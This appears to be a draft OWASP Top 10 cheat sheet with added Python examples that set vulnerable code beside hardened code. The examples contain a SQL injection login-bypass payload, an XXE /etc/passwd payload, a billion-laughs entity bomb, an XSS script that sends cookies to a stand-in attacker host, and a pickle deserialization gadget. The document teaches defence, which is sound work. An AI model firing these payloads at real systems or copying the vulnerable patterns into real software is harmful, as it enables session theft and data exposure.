
OWASP Top 10 Application Security Risks Cheat Sheet (DRAFT) by [deleted]

OWASP Top 10 Application Security Risks

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Introduction: OWASP

Although the original goal of the OWASP Top 10 project was simply to raise awareness amongst developers, it has become the de facto application security standard.
Source: https://www.owasp.org/images/b/b0/OWASP_Top_10_2017_RC2_Final.pdf. Copyright © 2003 – 2017 The OWASP Foundation. This document is released under the Creative Commons Attribution-ShareAlike 4.0 license. For any reuse or distribution, you must make it clear to others the license terms of this work.

A1:2017 Injection

Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
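Worked example (added here, not part of the OWASP document): the same login lookup written once by string concatenation and once with a parameterised query, run against a constructed in-memory SQLite table. The user names, passwords and the `' OR '1'='1` payload are sample data for the demo; the plaintext password column exists only to keep the injection visible.

```python
import sqlite3


def make_db():
    """Constructed sample database: two users, passwords stored in clear only for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    """Builds the statement by string formatting: attacker input becomes part of the SQL."""
    sql = "SELECT name FROM users WHERE name = '%s' AND password = '%s'" % (name, password)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, name, password):
    """Parameterised query: the driver binds the values as data, never as SQL syntax."""
    row = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?", (name, password)
    ).fetchone()
    return row[0] if row else None


def demo():
    """Attempt a password-less login with a tautology payload against both functions."""
    conn = make_db()
    payload = "' OR '1'='1"  # closes the password literal and appends an always-true clause
    return {
        # AND binds tighter than OR, so the WHERE clause becomes true for every row
        "vulnerable_bypass": login_vulnerable(conn, "alice", payload),
        # the same bytes are compared literally against the password column and fail
        "safe_bypass": login_safe(conn, "alice", payload),
        "safe_legit": login_safe(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    print(demo())
```

The bypass works because the vulnerable query ends up as `... AND password = '' OR '1'='1'`; the parameterised version never re-parses the input, so the same payload is simply a wrong password.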

A2:2017 Broken Authentication

Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities (temporarily or permanently).
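Worked example (added here, not from the OWASP document): the two building blocks that most often go wrong in this category, password storage and session tokens, done with the standard library only. Passwords get a per-user random salt and a slow PBKDF2 hash compared in constant time; sessions are keyed by a 256-bit random token that expires and can be revoked server-side. The iteration count and 15-minute idle timeout are assumptions for the demo, not recommended production values.

```python
import hashlib
import hmac
import secrets
import time

PBKDF2_ITERATIONS = 100_000  # assumption for the demo; raise it for production


def hash_password(password: str, salt: bytes = None) -> str:
    """Return 'pbkdf2_sha256$iterations$salt$digest' using a fresh random salt per user."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and iteration count, compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash format")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    # compare_digest does not short-circuit on the first differing byte
    return hmac.compare_digest(digest.hex(), digest_hex)


class SessionStore:
    """Server-side sessions: unguessable token, idle timeout, explicit logout."""

    def __init__(self, ttl_seconds: int = 900):
        self.ttl = ttl_seconds
        self._sessions = {}  # token -> (user, created_at)

    def create(self, user: str, now: float = None) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, not a counter
        self._sessions[token] = (user, now if now is not None else time.time())
        return token

    def lookup(self, token: str, now: float = None):
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user, created = entry
        now = now if now is not None else time.time()
        if now - created > self.ttl:
            del self._sessions[token]  # expired tokens are removed, not left reusable
            return None
        return user

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)


if __name__ == "__main__":
    stored = hash_password("correct horse")
    print(verify_password("correct horse", stored), verify_password("wrong", stored))
    store = SessionStore(ttl_seconds=60)
    tok = store.create("alice")
    print(store.lookup(tok))
```

The `now` parameters exist so the expiry logic can be exercised deterministically; in real code the clock comes from `time.time()`.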

A3:2017 Sensitive Data Exposure

Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII data. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.

A4:2017 XML External Entity (XXE)

Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, and denial of service attacks, such as the Billion Laughs attack.
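Worked example (added here, not from the OWASP document): a constructed file-disclosure XXE payload and a constructed entity-expansion ("billion laughs") payload, alongside a parser-independent check that refuses any untrusted document carrying a DTD. Without a DTD there is no place to declare an entity, so neither external references nor expansion bombs can appear. Python's stdlib `xml.etree` does not fetch external entities on its own, but the pre-check also covers parsers that do, and it stops internal expansion attacks before the parser sees them.

```python
import re
import xml.etree.ElementTree as ET

# Constructed attacker documents (sample payloads, not from the page).
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>"""

BILLION_LAUGHS = """<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>"""

# Constructed benign document of the kind an order API might accept.
BENIGN = "<order><item sku='A1' qty='2'/></order>"


class UnsafeXMLError(ValueError):
    """Raised when an untrusted document carries a DTD."""


_DOCTYPE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


def parse_untrusted_xml(data) -> ET.Element:
    """Reject any DOCTYPE (and therefore any <!ENTITY>), then parse normally."""
    raw = data.encode() if isinstance(data, str) else data
    if _DOCTYPE.search(raw):
        # Deliberately conservative: a DOCTYPE inside a comment or CDATA is also refused.
        raise UnsafeXMLError("DOCTYPE/DTD not allowed in untrusted XML")
    return ET.fromstring(raw)


def is_safe(data) -> bool:
    """True if the document is accepted by parse_untrusted_xml, False if it is refused."""
    try:
        parse_untrusted_xml(data)
        return True
    except UnsafeXMLError:
        return False


if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("xxe", XXE_PAYLOAD), ("laughs", BILLION_LAUGHS)):
        print(name, is_safe(doc))
```

If the application genuinely needs DTDs, the alternative is a parser configured to disable external entity resolution and cap entity expansion; refusing DTDs outright is the simpler rule when the schema does not require them.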

A5:2017 Broken Access Control

Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as accessing other users' accounts, viewing sensitive files, modifying other users' data, changing access rights, etc.
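Worked example (added here, not from the OWASP document): an insecure direct object reference on a constructed order store, beside the same lookup with a server-side ownership check, plus a role change that only an admin may perform. The users, roles and order ids are sample data; the `Forbidden` error is returned for both "not yours" and "does not exist" so a caller cannot enumerate which ids are real.

```python
from dataclasses import dataclass


@dataclass
class User:
    name: str
    role: str  # "customer" or "admin" (assumed role model for the demo)


# Constructed sample data: orders keyed by guessable sequential ids.
ORDERS = {
    1001: {"owner": "alice", "total": 42.0},
    1002: {"owner": "bob", "total": 99.5},
}


class Forbidden(PermissionError):
    """Access denied; deliberately does not say whether the object exists."""


def get_order_vulnerable(order_id: int):
    """Trusts the client to only ask for its own ids: any user can read any order."""
    return ORDERS[order_id]


def get_order(current_user: User, order_id: int):
    """Authorise on the server: owner or admin only, same error for missing and foreign ids."""
    order = ORDERS.get(order_id)
    if order is None or (order["owner"] != current_user.name and current_user.role != "admin"):
        raise Forbidden("order %d" % order_id)
    return order


def change_role(actor: User, target: User, new_role: str) -> None:
    """Changing access rights is an admin-only function; a customer cannot promote anyone."""
    if actor.role != "admin":
        raise Forbidden("role change attempted by %s" % actor.name)
    target.role = new_role


def denied(fn, *args) -> bool:
    """Demo helper: True if the call is rejected with Forbidden."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    alice = User("alice", "customer")
    print(get_order_vulnerable(1002))          # alice reads bob's order
    print(denied(get_order, alice, 1002))     # the checked version refuses
```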

A6:2017 Security Misconfiguration

Security misconfiguration is the most common issue in the OWASP data set, which is due in part to manual or ad hoc configuration (or not configuring at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, and not patching or upgrading systems, frameworks, dependencies, and components in a timely fashion (or at all).
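Worked example (added here, not from the OWASP document) for the HTTP-header part of this item: a small audit that runs over a response's headers and reports missing hardening headers, version disclosure in `Server`/`X-Powered-By`, and session cookies without `Secure`, `HttpOnly` or `SameSite`. Both header sets are constructed for the demo, and the list of required headers is an assumption, not an OWASP checklist.

```python
import re

# Constructed weak response headers (not captured from any real server).
WEAK_HEADERS = {
    "Server": "Apache/2.4.29 (Ubuntu)",       # discloses exact version
    "X-Powered-By": "PHP/7.2.24",             # discloses exact version
    "Content-Type": "text/html; charset=utf-8",
    "Set-Cookie": "session=abc123; Path=/",   # no Secure, HttpOnly or SameSite
}

# The same response after hardening (also constructed).
HARDENED_HEADERS = {
    "Server": "web",
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "Referrer-Policy": "no-referrer",
    "Set-Cookie": "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
}

# Assumed minimum set of hardening headers for this demo.
REQUIRED = (
    "Content-Security-Policy",
    "Strict-Transport-Security",
    "X-Content-Type-Options",
    "X-Frame-Options",
)
VERSION_RE = re.compile(r"/\d+(\.\d+)+")


def audit_headers(headers: dict) -> list:
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    findings = []
    for name in REQUIRED:
        if name.lower() not in h:
            findings.append("missing " + name)
    for name in ("server", "x-powered-by"):
        if name in h and VERSION_RE.search(h[name]):
            findings.append("version disclosed in " + name)
    cookie = h.get("set-cookie", "")
    if cookie:
        # attributes follow the first "name=value" pair, separated by semicolons
        attrs = {part.strip().split("=")[0].lower() for part in cookie.split(";")[1:]}
        for flag in ("secure", "httponly", "samesite"):
            if flag not in attrs:
                findings.append("cookie missing " + flag)
    return findings


if __name__ == "__main__":
    for f in audit_headers(WEAK_HEADERS):
        print("weak:", f)
    print("hardened:", audit_headers(HARDENED_HEADERS))
```

A check like this belongs in a deployment pipeline or a scheduled job rather than a one-off review, because headers regress silently when a proxy or framework is upgraded.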

A7:2017 Cross-Site Scripting (XSS)

XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
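Worked example (added here, not from the OWASP document): server-side rendering of untrusted input into three different output contexts. The point the paragraph does not spell out is that escaping is context-specific: the encoder for HTML text is not enough for a quoted attribute (quotes must be escaped too), and neither is right for a URL query parameter. The attacker strings and the `breaks_out` check are constructed for the demo.

```python
import html
from urllib.parse import quote

# Constructed attacker inputs (not from the page).
PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)'


def render_vulnerable(name: str) -> str:
    """Untrusted data pasted straight into markup."""
    return "<p>Hello, %s</p>" % name


def render_attribute_vulnerable(value: str) -> str:
    """Untrusted data pasted into a quoted attribute without escaping quotes."""
    return '<input value="%s">' % value


def render_html_text(name: str) -> str:
    """HTML text context: < > & become entities, so the browser cannot start a tag."""
    return "<p>Hello, %s</p>" % html.escape(name, quote=False)


def render_html_attribute(value: str) -> str:
    """Quoted attribute context: quotes must be escaped too, or the attacker closes the
    attribute and appends an event handler."""
    return '<input value="%s">' % html.escape(value, quote=True)


def render_url_param(value: str) -> str:
    """URL context: percent-encode everything placed in a query string."""
    return '<a href="/search?q=%s">search</a>' % quote(value, safe="")


def breaks_out(markup: str) -> bool:
    """Demo check: does a live <script tag or an injected event handler survive in the output?"""
    return "<script" in markup or '" onmouseover="' in markup


if __name__ == "__main__":
    for fn in (render_vulnerable, render_html_text):
        print(breaks_out(fn(PAYLOAD)), fn(PAYLOAD))
    for fn in (render_attribute_vulnerable, render_html_attribute):
        print(breaks_out(fn(ATTR_PAYLOAD)), fn(ATTR_PAYLOAD))
    print(render_url_param(PAYLOAD))
```

`html.escape` covers the two HTML contexts shown; data placed inside inline JavaScript or a CSS value needs yet another encoder, which is why template engines with automatic, context-aware escaping are preferable to hand-rolled string formatting.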

A8:2017 Insecure Deserialization

Insecure deserialization flaws occur when an application receives hostile serialized objects. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, serialized objects can be replayed, tampered with or deleted to spoof users, conduct injection attacks, and elevate privileges.
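Worked example (added here, not from the OWASP document), using Python's `pickle` as the native serializer: a class whose `__reduce__` returns a callable, so `pickle.loads` executes that call before the application ever sees an object. The callable here only appends to a list so the demo stays harmless; a real payload would name `os.system` or similar. Beside it is the hardened pattern: a data-only format (JSON) plus an HMAC over the bytes, so a tampered or replayed-then-edited payload is rejected before parsing. The secret key is generated at import time for the demo and is assumed to live only on the server.

```python
import hashlib
import hmac
import json
import pickle
import secrets

CALLS = []  # demo instrumentation: records what deserialization executed


def _record(message: str) -> None:
    """Stand-in for the attacker's chosen callable (os.system in a real exploit)."""
    CALLS.append(message)


class Gadget:
    """pickle serialises an object as 'call this, with these args'; loads obeys."""

    def __reduce__(self):
        return (_record, ("code ran during pickle.loads",))


def attacker_blob() -> bytes:
    """What an attacker would send to an endpoint that unpickles client data."""
    return pickle.dumps(Gadget())


def load_vulnerable(blob: bytes):
    """pickle.loads runs the embedded call before returning anything."""
    return pickle.loads(blob)


# --- hardened alternative: data-only format with integrity protection ---------------

SECRET = secrets.token_bytes(32)  # assumption: server-side key, never sent to clients


def dump_signed(obj) -> bytes:
    """JSON body followed by '.' and a hex HMAC-SHA256 over the body."""
    body = json.dumps(obj, separators=(",", ":"), sort_keys=True).encode()
    tag = hmac.new(SECRET, body, hashlib.sha256).hexdigest().encode()
    return body + b"." + tag


def load_signed(blob: bytes):
    """Verify the tag in constant time, then parse. JSON can only yield plain data types."""
    body, _, tag = blob.rpartition(b".")
    expected = hmac.new(SECRET, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("tampered or forged payload")
    return json.loads(body)


def accepts(blob: bytes) -> bool:
    """Demo helper: True if load_signed accepts the blob."""
    try:
        load_signed(blob)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    load_vulnerable(attacker_blob())
    print(CALLS)
    signed = dump_signed({"user": "alice", "role": "customer"})
    print(accepts(signed), accepts(signed.replace(b'"customer"', b'"admin"')))
```

Signing does not make `pickle` safe; it only protects data formats that cannot express code. The combination shown here is what the "do not accept serialized objects from untrusted sources" advice looks like in practice.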

A9:2017 Using Components with Known Vulnerabilities

Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.

A10:2017 Insufficient Logging & Monitoring

Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper with, extract or destroy data. Most breach studies show that time to detect a breach is over 200 days, and that breaches are typically detected by external parties rather than internal processes or monitoring.
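Worked example (added here, not from the OWASP document): the smallest useful piece of the monitoring side, a detection that parses constructed SSH-style authentication log lines and flags an IP with repeated failures inside a sliding window, escalating the alert if a login from that IP then succeeds. The log format, the 4-failure threshold and the 5-minute window are assumptions for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not from any real system).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z auth sshd: Failed password for admin from 203.0.113.7 port 51122
2024-05-01T10:00:02Z auth sshd: Failed password for admin from 203.0.113.7 port 51123
2024-05-01T10:00:02Z auth sshd: Failed password for root from 203.0.113.7 port 51124
2024-05-01T10:00:03Z auth sshd: Failed password for admin from 203.0.113.7 port 51125
2024-05-01T10:00:04Z auth sshd: Failed password for guest from 203.0.113.7 port 51126
2024-05-01T10:00:05Z auth sshd: Accepted password for admin from 203.0.113.7 port 51127
2024-05-01T10:00:09Z auth sshd: Failed password for alice from 198.51.100.4 port 40001
2024-05-01T10:30:00Z auth sshd: Failed password for alice from 198.51.100.4 port 40002
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth sshd: (?P<outcome>Failed|Accepted) password for (?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+$"
)


def parse(log_text: str) -> list:
    """Turn matching lines into (timestamp, outcome, user, ip) tuples."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # in production, unparseable lines deserve their own alert
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["outcome"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events: list, threshold: int = 4, window=timedelta(minutes=5)) -> dict:
    """Map ip -> 'bruteforce' when failures in the window reach the threshold, upgraded to
    'success_after_failures' if that ip then logs in successfully."""
    failures = defaultdict(list)  # ip -> timestamps of recent failures, oldest first
    alerts = {}
    for ts, outcome, user, ip in sorted(events):
        if outcome == "Failed":
            recent = failures[ip]
            recent.append(ts)
            while recent and ts - recent[0] > window:
                recent.pop(0)  # slide the window: forget failures that are too old
            if len(recent) >= threshold and ip not in alerts:
                alerts[ip] = "bruteforce"
        elif outcome == "Accepted" and len(failures[ip]) >= threshold:
            alerts[ip] = "success_after_failures"  # the case that should page someone
    return alerts


if __name__ == "__main__":
    for ip, kind in detect_bruteforce(parse(SAMPLE_LOG)).items():
        print(ip, kind)
```

In the sample, 203.0.113.7 fails four times within seconds and then succeeds, so it is escalated; 198.51.100.4 has two failures half an hour apart, which the sliding window correctly ignores. The detection is only as good as what gets logged: without the "Accepted" line the escalation is impossible, which is the point of the paragraph.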